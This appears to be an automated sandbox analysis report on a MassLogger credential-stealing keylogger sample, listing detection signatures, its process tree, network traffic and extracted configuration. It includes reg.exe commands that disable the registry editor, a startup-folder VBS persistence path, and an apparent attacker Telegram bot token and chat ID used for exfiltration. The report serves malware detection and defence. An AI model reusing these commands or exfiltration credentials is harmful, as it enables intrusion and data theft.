Edit tour

Windows Analysis Report
tNXl4XhgmV.exe

Overview

General Information

Sample name:	tNXl4XhgmV.exe renamed because original name is a hash value
Original sample name:	eb3c77ccbedf21f84a138c9f85ca4a4153e9f8dcd14fe21e5bad8207b72b2fbe.exe
Analysis ID:	1588685
MD5:	5a08ce9fce5f6482d2a785e0117370bf
SHA1:	d4e3a46776ec83776083f34c9c7643f7c92cbfa0
SHA256:	eb3c77ccbedf21f84a138c9f85ca4a4153e9f8dcd14fe21e5bad8207b72b2fbe
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

MassLogger RAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Yara detected MassLogger RAT

Yara detected Telegram RAT

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Disables CMD prompt

Disables the Windows registry editor (regedit)

Drops VBS files to the startup folder

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses cmd line tools excessively to alter registry or file data

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

AV process strings found (often used to terminate AV products)

Contains functionality for read data from the clipboard

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Extensive use of GetProcAddress (often used to hide API calls)

Found WSH timer for Javascript or VBS script (likely evasive script)

Found evasive API chain (date check)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Uses reg.exe to modify the Windows registry

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

tNXl4XhgmV.exe (PID: 7644 cmdline: "C:\Users\user\Desktop\tNXl4XhgmV.exe" MD5: 5A08CE9FCE5F6482D2A785E0117370BF)

vaccinatory.exe (PID: 7700 cmdline: "C:\Users\user\Desktop\tNXl4XhgmV.exe" MD5: 5A08CE9FCE5F6482D2A785E0117370BF)

RegSvcs.exe (PID: 7728 cmdline: "C:\Users\user\Desktop\tNXl4XhgmV.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

reg.exe (PID: 7880 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

wscript.exe (PID: 8000 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

vaccinatory.exe (PID: 8052 cmdline: "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe" MD5: 5A08CE9FCE5F6482D2A785E0117370BF)

RegSvcs.exe (PID: 8068 cmdline: "C:\Users\user\AppData\Local\ghauts\vaccinatory.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

reg.exe (PID: 8160 cmdline: REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f MD5: CDD462E86EC0F20DE2A1D781928B1B0C)

conhost.exe (PID: 8168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cleanup

Malware Configuration

Threatname: MassLogger

{"EXfil Mode": "Telegram", "Telegram Token": "7073317340:AAFWdXRggsASWaZSDfhWorEV6X61eia3PR0", "Telegram Chatid": "7231705582"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf32d:$a1: get_encryptedPassword 0xf661:$a2: get_encryptedUsername 0xf0b6:$a3: get_timePasswordChanged 0xf1d7:$a4: get_passwordField 0xf343:$a5: set_encryptedPassword 0x10cc7:$a7: get_logins 0x10978:$a8: GetOutlookPasswords 0x1076a:$a9: StartKeylogger 0x10c17:$a10: KeyLoggerEventArgs 0x107c7:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.1312119770.00000000009E0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14548:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13a46:$a3: \Google\Chrome\User Data\Default\Login Data 0x13d54:$a4: \Orbitum\User Data\Default\Login Data 0x14b4c:$a5: \Kometa\User Data\Default\Login Data
0000000A.00000002.2538612035.0000000002E67000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf32d:$a1: get_encryptedPassword 0xf661:$a2: get_encryptedUsername 0xf0b6:$a3: get_timePasswordChanged 0xf1d7:$a4: get_passwordField 0xf343:$a5: set_encryptedPassword 0x10cc7:$a7: get_logins 0x10978:$a8: GetOutlookPasswords 0x1076a:$a9: StartKeylogger 0x10c17:$a10: KeyLoggerEventArgs 0x107c7:$a11: KeyLoggerEventArgsEventHandler
00000009.00000002.1428044082.00000000036B0000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14548:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13a46:$a3: \Google\Chrome\User Data\Default\Login Data 0x13d54:$a4: \Orbitum\User Data\Default\Login Data 0x14b4c:$a5: \Kometa\User Data\Default\Login Data
00000004.00000002.2538888760.0000000002F37000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000A.00000002.2536490753.0000000000414000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vaccinatory.exe PID: 7700	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: vaccinatory.exe PID: 7700	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vaccinatory.exe PID: 7700	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vaccinatory.exe PID: 7700	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xaaac2:$a1: get_encryptedPassword 0xaade7:$a2: get_encryptedUsername 0xaa85f:$a3: get_timePasswordChanged 0xaa980:$a4: get_passwordField 0xaaad8:$a5: set_encryptedPassword 0xac403:$a7: get_logins 0xac0b4:$a8: GetOutlookPasswords 0xabea6:$a9: StartKeylogger 0xac353:$a10: KeyLoggerEventArgs 0xabf03:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 7728	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 7728	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vaccinatory.exe PID: 8052	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
Process Memory Space: vaccinatory.exe PID: 8052	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: vaccinatory.exe PID: 8052	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: vaccinatory.exe PID: 8052	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x1b7d53:$a1: get_encryptedPassword 0x1b8078:$a2: get_encryptedUsername 0x1b7af0:$a3: get_timePasswordChanged 0x1b7c11:$a4: get_passwordField 0x1b7d69:$a5: set_encryptedPassword 0x1b9694:$a7: get_logins 0x1b9345:$a8: GetOutlookPasswords 0x1b9137:$a9: StartKeylogger 0x1b95e4:$a10: KeyLoggerEventArgs 0x1b9194:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 8068	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 19 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
10.2.RegSvcs.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
10.2.RegSvcs.exe.400000.0.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14548:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13a46:$a3: \Google\Chrome\User Data\Default\Login Data 0x13d54:$a4: \Orbitum\User Data\Default\Login Data 0x14b4c:$a5: \Kometa\User Data\Default\Login Data
9.2.vaccinatory.exe.36b0000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.vaccinatory.exe.36b0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vaccinatory.exe.36b0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vaccinatory.exe.36b0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf32d:$a1: get_encryptedPassword 0xf661:$a2: get_encryptedUsername 0xf0b6:$a3: get_timePasswordChanged 0xf1d7:$a4: get_passwordField 0xf343:$a5: set_encryptedPassword 0x10cc7:$a7: get_logins 0x10978:$a8: GetOutlookPasswords 0x1076a:$a9: StartKeylogger 0x10c17:$a10: KeyLoggerEventArgs 0x107c7:$a11: KeyLoggerEventArgsEventHandler
9.2.vaccinatory.exe.36b0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14548:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13a46:$a3: \Google\Chrome\User Data\Default\Login Data 0x13d54:$a4: \Orbitum\User Data\Default\Login Data 0x14b4c:$a5: \Kometa\User Data\Default\Login Data
9.2.vaccinatory.exe.36b0000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
9.2.vaccinatory.exe.36b0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.vaccinatory.exe.36b0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
9.2.vaccinatory.exe.36b0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd52d:$a1: get_encryptedPassword 0xd861:$a2: get_encryptedUsername 0xd2b6:$a3: get_timePasswordChanged 0xd3d7:$a4: get_passwordField 0xd543:$a5: set_encryptedPassword 0xeec7:$a7: get_logins 0xeb78:$a8: GetOutlookPasswords 0xe96a:$a9: StartKeylogger 0xee17:$a10: KeyLoggerEventArgs 0xe9c7:$a11: KeyLoggerEventArgsEventHandler
9.2.vaccinatory.exe.36b0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12748:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11c46:$a3: \Google\Chrome\User Data\Default\Login Data 0x11f54:$a4: \Orbitum\User Data\Default\Login Data 0x12d4c:$a5: \Kometa\User Data\Default\Login Data
3.2.vaccinatory.exe.9e0000.1.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.vaccinatory.exe.9e0000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.vaccinatory.exe.9e0000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.vaccinatory.exe.9e0000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xd52d:$a1: get_encryptedPassword 0xd861:$a2: get_encryptedUsername 0xd2b6:$a3: get_timePasswordChanged 0xd3d7:$a4: get_passwordField 0xd543:$a5: set_encryptedPassword 0xeec7:$a7: get_logins 0xeb78:$a8: GetOutlookPasswords 0xe96a:$a9: StartKeylogger 0xee17:$a10: KeyLoggerEventArgs 0xe9c7:$a11: KeyLoggerEventArgsEventHandler
3.2.vaccinatory.exe.9e0000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x12748:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x11c46:$a3: \Google\Chrome\User Data\Default\Login Data 0x11f54:$a4: \Orbitum\User Data\Default\Login Data 0x12d4c:$a5: \Kometa\User Data\Default\Login Data
3.2.vaccinatory.exe.9e0000.1.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
3.2.vaccinatory.exe.9e0000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.vaccinatory.exe.9e0000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
3.2.vaccinatory.exe.9e0000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xf32d:$a1: get_encryptedPassword 0xf661:$a2: get_encryptedUsername 0xf0b6:$a3: get_timePasswordChanged 0xf1d7:$a4: get_passwordField 0xf343:$a5: set_encryptedPassword 0x10cc7:$a7: get_logins 0x10978:$a8: GetOutlookPasswords 0x1076a:$a9: StartKeylogger 0x10c17:$a10: KeyLoggerEventArgs 0x107c7:$a11: KeyLoggerEventArgsEventHandler
3.2.vaccinatory.exe.9e0000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x14548:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x13a46:$a3: \Google\Chrome\User Data\Default\Login Data 0x13d54:$a4: \Orbitum\User Data\Default\Login Data 0x14b4c:$a5: \Kometa\User Data\Default\Login Data
Click to see the 17 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , ProcessId: 8000, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs" , ProcessId: 8000, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe, ProcessId: 7700, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vaccinatory.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-11T04:10:52.299880+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49701	132.226.247.73	80	TCP
2025-01-11T04:11:02.674905+0100	2803274	2	Potentially Bad Traffic	192.168.2.7	49749	132.226.247.73	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 9.2.vaccinatory.exe.36b0000.1.raw.unpack

Malware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7073317340:AAFWdXRggsASWaZSDfhWorEV6X61eia3PR0", "Telegram Chatid": "7231705582"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

ReversingLabs: Detection: 65%

Multi AV Scanner detection for submitted file

Source: tNXl4XhgmV.exe	Virustotal: Detection: 48%			Perma Link
Source: tNXl4XhgmV.exe	ReversingLabs: Detection: 65%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: tNXl4XhgmV.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: tNXl4XhgmV.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49702 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49756 version: TLS 1.0

Source:	Binary string: wntdll.pdbUGP source: vaccinatory.exe, 00000003.00000003.1309242828.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1310335375.0000000003920000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1422258866.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1420731175.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: vaccinatory.exe, 00000003.00000003.1309242828.0000000003AC0000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000003.00000003.1310335375.0000000003920000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1422258866.0000000003C50000.00000004.00001000.00020000.00000000.sdmp, vaccinatory.exe, 00000009.00000003.1420731175.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E445A GetFileAttributesW,FindFirstFileW,FindClose,	1_2_001E445A
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EC6D1 FindFirstFileW,FindClose,	1_2_001EC6D1
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EC75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	1_2_001EC75C
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EEF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_001EEF95
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EF0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	1_2_001EF0F2
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EF3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_001EF3F3
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E37EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_001E37EF
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001E3B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	1_2_001E3B12
Source: C:\Users\user\Desktop\tNXl4XhgmV.exe	Code function: 1_2_001EBCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	1_2_001EBCBC
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082445A GetFileAttributesW,FindFirstFileW,FindClose,	3_2_0082445A
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082C6D1 FindFirstFileW,FindClose,	3_2_0082C6D1
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	3_2_0082C75C
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0082EF95
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	3_2_0082F0F2
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_0082F3F3
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_008237EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_008237EF
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_00823B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	3_2_00823B12
Source: C:\Users\user\AppData\Local\ghauts\vaccinatory.exe	Code function: 3_2_0082BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	3_2_0082BCBC

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0131AF51h	4_2_0131ACA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0131B7F2h	4_2_0131B3CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0131B7F2h	4_2_0131B71F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 010AB679h	10_2_010AB3C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 010ABC40h	10_2_010AB828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 010AFAA0h	10_2_010AF680
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 010ABC40h	10_2_010ABB6E

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 104.21.48.1 104.21.48.1
Source: Joe Sandbox View	IP Address: 132.226.247.73 132.226.247.73

Source: Joe Sandbox View

JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49749 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49701 -> 132.226.247.73:80

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49702 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.48.1:443 -> 192.168.2.7:49756 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\tNXl4XhgmV.exe

Code function: 1_2_001F22EE InternetReadFile,InternetQueryDataAvailable,InternetReadFile,

1_2_001F22EE

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
